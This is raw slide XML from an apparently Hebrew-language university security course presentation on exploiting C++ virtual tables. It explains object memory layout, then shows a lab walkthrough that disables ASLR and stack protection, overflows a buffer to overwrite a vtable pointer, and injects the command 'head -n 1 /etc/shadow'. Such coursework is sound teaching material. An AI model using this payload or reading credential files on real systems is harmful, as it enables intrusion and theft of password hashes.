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0" r:id="rId6"/>
    <p:sldId id="264" r:id="rId7"/>
    <p:sldId id="265" r:id="rId8"/>
    <p:sldId id="263" r:id="rId9"/>
    <p:sldId id="266" r:id="rId10"/>
    <p:sldId id="268" r:id="rId11"/>
    <p:sldId id="267" r:id="rId12"/>
    <p:sldId id="261" r:id="rId13"/>
    <p:sldId id="270" r:id="rId14"/>
    <p:sldId id="269" r:id="rId15"/>
    <p:sldId id="272" r:id="rId16"/>
    <p:sldId id="271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z" initials="O" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="O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6-04T12:35:32.320" idx="1">
    <p:pos x="10" y="10"/>
    <p:text>אולי גם את שורת הפקודה ulimit - c unlimited</p:text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D5051-817E-4EEE-BAE5-1253988BD1BC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5859-9616-4F09-BE2E-3D958E839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941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D5051-817E-4EEE-BAE5-1253988BD1BC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5859-9616-4F09-BE2E-3D958E839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67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D5051-817E-4EEE-BAE5-1253988BD1BC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5859-9616-4F09-BE2E-3D958E839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842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D5051-817E-4EEE-BAE5-1253988BD1BC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5859-9616-4F09-BE2E-3D958E839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08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D5051-817E-4EEE-BAE5-1253988BD1BC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5859-9616-4F09-BE2E-3D958E839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17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D5051-817E-4EEE-BAE5-1253988BD1BC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5859-9616-4F09-BE2E-3D958E839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0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D5051-817E-4EEE-BAE5-1253988BD1BC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5859-9616-4F09-BE2E-3D958E839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32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D5051-817E-4EEE-BAE5-1253988BD1BC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5859-9616-4F09-BE2E-3D958E839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306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D5051-817E-4EEE-BAE5-1253988BD1BC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5859-9616-4F09-BE2E-3D958E839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164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D5051-817E-4EEE-BAE5-1253988BD1BC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5859-9616-4F09-BE2E-3D958E839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43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D5051-817E-4EEE-BAE5-1253988BD1BC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5859-9616-4F09-BE2E-3D958E839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857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D5051-817E-4EEE-BAE5-1253988BD1BC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55859-9616-4F09-BE2E-3D958E839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285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 subjects in cyber security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Oz Levi 305181158</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avishalom  Jan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10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Ex1.1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploiting C++ VTABLES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המשך הקוד:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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98" y="1472339"/>
            <a:ext cx="6671697" cy="3595607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320" y="3058448"/>
            <a:ext cx="6392971" cy="368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775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Ex1.1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploiting C++ VTABLES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הערות לפני הרצה:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>אנו נשתמש בקומפיילר </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>++ בכדי ליישם את התרגיל.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>בכדי לבטל את הרנדומיזציה האוטומטית של מערכת ההפעלה יש להריץ:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>echo 0 &gt; /proc/sys/kernel/randomize_va_space</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>בהרצה</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>יש להתשמש באפשרות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>אשר תקמפל את הקוד בשיטת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>ביט למחשבים מבוססים 64ביט.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>אפשרות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>–g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> בכדי ליצור קובץ עבור </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>אפשרות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>–fno-stack-protector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> בכדי להמנע מההגנה האוטומטית על דריסת המחסנית</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>++ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-g -m32 -fno-stack-protector victim.c -o victim.out</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2239162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Ex1.1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploiting C++ VTABLES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ההתקפה שלנו תתבסס על הצפת הבאפר ושכתוב כתובתו של מופע ב' ע"י הצפת מופע א'.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>הכתובת הנדרסת היא הכתובת הפונ' בטבלה הווירטואלית</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>ראשית, נמצא את כתובתה בטבלה הווירטואלית של הפונ' אותה נרצה להפעיל, במקרה שלנו </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>commandExecuter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> (נשמור בתור אינדיאני קטן).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>זאת נבצע ע"י פקודת	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>objdump –d victim.o &gt; victim.odfile</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>ובקובץ שקיבלנו, תופיע לנו כתובתה של הטבלה הווירטואלית, שזו בעצם הכתובת המופיעה בבנאי המחלקה ומאוכלסת באוגר </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL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538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Ex1.1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploiting C++ VTABLES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ראשית, נמצא את כתובתה בטבלה הווירטואלית של הפונ' אותה נרצה להפעיל, במקרה שלנו </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>commandExecuter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>זאת נבצע ע"י פקודת	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>objdump –d victim.o &gt; victim.odfile</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>ובקובץ שקיבלנו, תופיע לנו כתובתה של הטבלה הווירטואלית, שזו בעצם הכתובת המופיעה בבנאי המחלקה ומאוכלסת באוגר </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>שלב הבא, אנו נמדוד את המרחק בין המשתנה הדורס, למשתנה הנדרס</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>זאת ניתן לראות במקום בהם מוקצים, ז"א </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>בפונק' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>ה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL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97430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Ex1.1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploiting C++ VTABLES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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692" y="2170690"/>
            <a:ext cx="5991225" cy="1609725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2764" y="4097687"/>
            <a:ext cx="7058025" cy="24193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33274" y="2898182"/>
            <a:ext cx="438602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he-IL" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>בתוך קוד הפונ' נוכל לראות את הכתובת בו היא מאוכלסת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24774" y="1690688"/>
            <a:ext cx="4929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2400" b="1" dirty="0" smtClean="0"/>
              <a:t>מציאת הכתובות ומרחב הבאפר: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39485" y="3937251"/>
            <a:ext cx="4246536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he-IL" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>בפונ' הראשית נמצא את השימוש בהשוואת מחרוזות, כך נעלה על המיקום בו נטען ה"באפר".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9485" y="5303328"/>
            <a:ext cx="4246536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he-IL" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ושוב בפונ' הראשית נמצא את הקריאה לפונ' "גריט" ונשם לב כי הטעינה לפני משתייכת למשתנה "ג'י".</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="מחבר חץ ישר 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4386021" y="5904853"/>
            <a:ext cx="3936569" cy="91440"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="412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חץ ישר 16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4386021" y="4398916"/>
            <a:ext cx="3921071" cy="461665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חץ ישר 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6301917" y="2802836"/>
            <a:ext cx="331357" cy="17271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518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Ex1.1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploiting C++ VTABLES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חישובים:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>כתובתה של הפונ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CommandExecuter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> היא 8048874 לכן נכתוב </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x74\x88\x04\x08</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>כתובתו של המשתנה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-0x4c(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ebp)</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>כתובתו </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>של המשתנה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-0xc(%ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>מפני ששתי המשתנים נוצרים אחר אחרי השני באותה פונ', נסיק כי ערכו של </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> זהה ונחשב את המרחק ע"י חיסור הכתובות בהקסה</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-\xc – (-\x4) = \x40 = 64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>decimal</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/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421044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Ex1.1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploiting C++ VTABLES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לסיום ניצור את שורת הקלט שלנו</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>python -c 'print "y\x00" + 		// make the age check pass </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"A"*62 + 			// fill the rest of 'buf‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" \x74\x88\x04\x08" + 		// overwrite g's vtable pointer with the address of 					CommandExecutor's vtable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"\n" + 				// end the first input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"head -n 1 /etc/shadow\n"‘	// command to run.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>| ./victim.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4139943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Ex1.1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploiting C++ VTABLES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תוצאות...?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24852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Ex1.1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploiting C++ VTABLES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מטרת התרגיל היא להשתמש בצורת המימוש של מופע ווירטואלי כלשהו בתוכנית </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>++ בכדי ליצור נוזקה.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>בהצגה הבאה אנו נתמקד בשיכתוב כתובתה של פונ' ווירטואלית בקוד, בכתובת של פונ' ווירטואלית אחרת.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>במקרה זה אנו נתעסק במחלקות ברמת הורשה ראשונה או ללא הורשה כלל.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283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Ex1.1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploiting C++ VTABLES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קצת על שימוש בזיכרון בתוכנית </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>++:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>כמובן שהשימוש בזיכרון תלוי בקומפיילר, וכל אחד מבצע זאת בצורה שונה. אך השוני בין רבים מוקרים מאוד קטן והם מתבססים על אותו רעיון תיאורתי.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>ביצירה של מחלקה כלשהי במהלך התוכנית, מוקצת למחלקה כתובת זיכרון באורך הנדרש.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>נוכל להדפיס נתונים אלו עבור המחלקה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> באופן הבא:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Foo f;</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>printf("sizeof(f) = %d, f = %d\n", sizeof(f), (int)(*(char *)&amp;f));</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>כל מחלקה ניתנת לגישה כמצביע של מצביעים, כך שהמצביע הראשון מצייגת מערך מצביעים למשני המחלקה.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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667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Ex1.1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploiting C++ VTABLES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84002"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>קצת על שימוש בזיכרון בתוכנית </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>++:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>כל מחלקה ניתנת לגישה כמצביע של מצביעים, כך שהמצביע הראשון מצייגת מערך מצביעים למשני המחלקה.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>לדוגמא שוב עבור המחלקה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rt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7176" y="2864386"/>
            <a:ext cx="2836190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class Foo {</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>public:</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>int v1=1;</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>int v2=2;</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>int v3=3;</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>	{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24933" y="4835684"/>
            <a:ext cx="8458201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int main() {</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Foo f; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	int *vars = (int *)&amp;f;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	printf("vars[0] = %d, vars[1] = %d, vars[2] = %d\n", 34 vars[0], vars[1], vars[2]);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2801280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Ex1.1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploiting C++ VTABLES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פונקציות וזיכרון ווירטואלי בתוכנית </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>C++</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>ההבדל בין פונ' ווירטואליות לבין פונ' סטנדרטיות בא לידי ביטוי כאשר אנו מתעסקים במחלקת בן אשר יורשת ממחלקת אב כלשהו.</a:t>
            </a:r>
          </a:p>
          <a:p>
